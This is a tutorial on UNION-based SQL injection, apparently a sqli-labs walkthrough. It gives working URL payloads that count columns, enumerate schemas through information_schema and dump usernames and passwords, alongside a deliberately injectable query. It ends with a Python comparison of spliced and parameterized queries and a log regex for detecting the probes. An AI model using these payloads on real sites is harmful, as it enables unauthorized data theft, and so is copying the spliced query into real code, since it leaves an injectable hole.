0x00 Introduction
The UNION operator combines the result sets of two or more SELECT statements.
For a UNION-based SQL injection to succeed, four conditions must be met:
1. The injected SELECT returns the same number of columns as the original query.
2. The columns have compatible data types.
3. The column order of the two SELECT statements matches.
4. The current page echoes query output somewhere (there is a visible output point).
0x01 General procedure for union injection
- Determine the column count with ORDER BY
- Find which columns are echoed on the page
- Read database names
- Read table names
- Read column names
- Read data
0x02 Database syntax
1. Database query
select column_name from table_name
2. About ORDER BY and LIMIT
If the query already ends in ORDER BY or LIMIT, a UNION SELECT cannot simply be appended after it; the statement is a syntax error.
Wrong demonstrations:
select * from users order by id union select 1,2,3;
select * from users limit 0,1 union select 1,2,3;
The injection exists because the GET parameter id is spliced directly into the query with no filtering. In the source it appears as id='$id', wrapped in single quotes, so the payload has to close the quote.
Relevant source:
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
Query version
select * from users where id=-1 union select 1,(select version()),3;
0x03 Injection walkthrough
The source wraps the value as id='$id', so we close the single quote and comment out the rest of the query with --+ (the + decodes to the space MySQL requires after --).
/?id=1' order by 1--+
order by 2 and order by 3 succeed and order by 4 errors, so the column count is 3.
/?id=1' order by 4--+
Then start the UNION injection. Write a simple statement with an empty id value so the original query matches nothing and only our UNION data is echoed:
/?id=' union select 1,2,3--+
/?id=' union select 1,(select version()),3--+
/?id=' union select 1,(select user()),3--+
/?id=' union select 1,(select database()),3--+
Change the 0 in limit 0,1 to see the following rows:
/?id=' union select 1,(select schema_name from information_schema.schemata limit 0,1),3--+
GROUP_CONCAT() returns multiple rows as a single value:
/?id=' union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+
View tables:
/?id=' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+
/?id=' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+
View the columns of a table:
/?id=' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3--+
Simple data read:
/?id=' union select 1,2,username from users--+
/?id=' union select 1,2,concat_ws(':',username,password) from users--+
/?id=' union select 1,concat_ws(':',username,password),3 from users limit 2,1--+
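To make the contrast concrete, here is an added Python example (not from the post or from sqli-labs) that rebuilds the page's query in SQLite: the string-spliced form from the source snippet above answers the page's version payload with attacker-chosen columns, the bound-parameter form treats the same input as plain data, and a small log check flags the ORDER BY and UNION SELECT probes used in the walkthrough. sqlite_version() stands in for MySQL's version(); the table rows and access-log lines are constructed.

```python
import re
import sqlite3
from urllib.parse import unquote_plus


def make_db():
    # Constructed in-memory stand-in for the `users` table; rows are made up.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1,'Dumb','Dumb'),(2,'Angelina','I-kill-you'),(3,'Dummy','p@ssword');
    """)
    return conn


def lookup_vulnerable(conn, id_value):
    # Same shape as the page's $sql: the raw GET value is spliced into the SQL text,
    # so a quote closes the literal and "-- " comments out the trailing LIMIT.
    sql = f"SELECT * FROM users WHERE id='{id_value}' LIMIT 0,1"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, id_value):
    # Hardened form: the value is bound as a parameter, so quotes, UNION and
    # comment markers inside it are compared as data, never parsed as SQL.
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (id_value,)).fetchall()


# The page's version payload as the application sees it after URL decoding
# ("--+" arrives as "-- "); sqlite_version() stands in for MySQL's version().
VERSION_PAYLOAD = "' union select 1,(select sqlite_version()),3-- "

# Probe patterns from the walkthrough: ORDER BY column counting, UNION SELECT,
# and reads of information_schema. Tune for apps that legitimately sort via GET.
UNION_PROBE = re.compile(r"(?i)\border\s+by\s+\d+|\bunion\s+(?:all\s+)?select\b|information_schema")


def flag_union_probe(log_line):
    """True when the request path in a combined-format access log line carries a probe."""
    m = re.search(r'"(?:GET|POST) (\S+)', log_line)
    return bool(m) and bool(UNION_PROBE.search(unquote_plus(m.group(1))))


# Constructed access-log lines (not from the page); the first two carry its payloads.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /?id=1%27%20order%20by%204--+ HTTP/1.1" 500 0',
    '10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /?id=%27%20union%20select%201,(select%20database()),3--+ HTTP/1.1" 200 0',
    '10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /?id=1 HTTP/1.1" 200 0',
]
```

Running the two lookups against VERSION_PAYLOAD shows the difference directly: the spliced query returns a single row whose middle column is the database version, the parameterized query returns nothing.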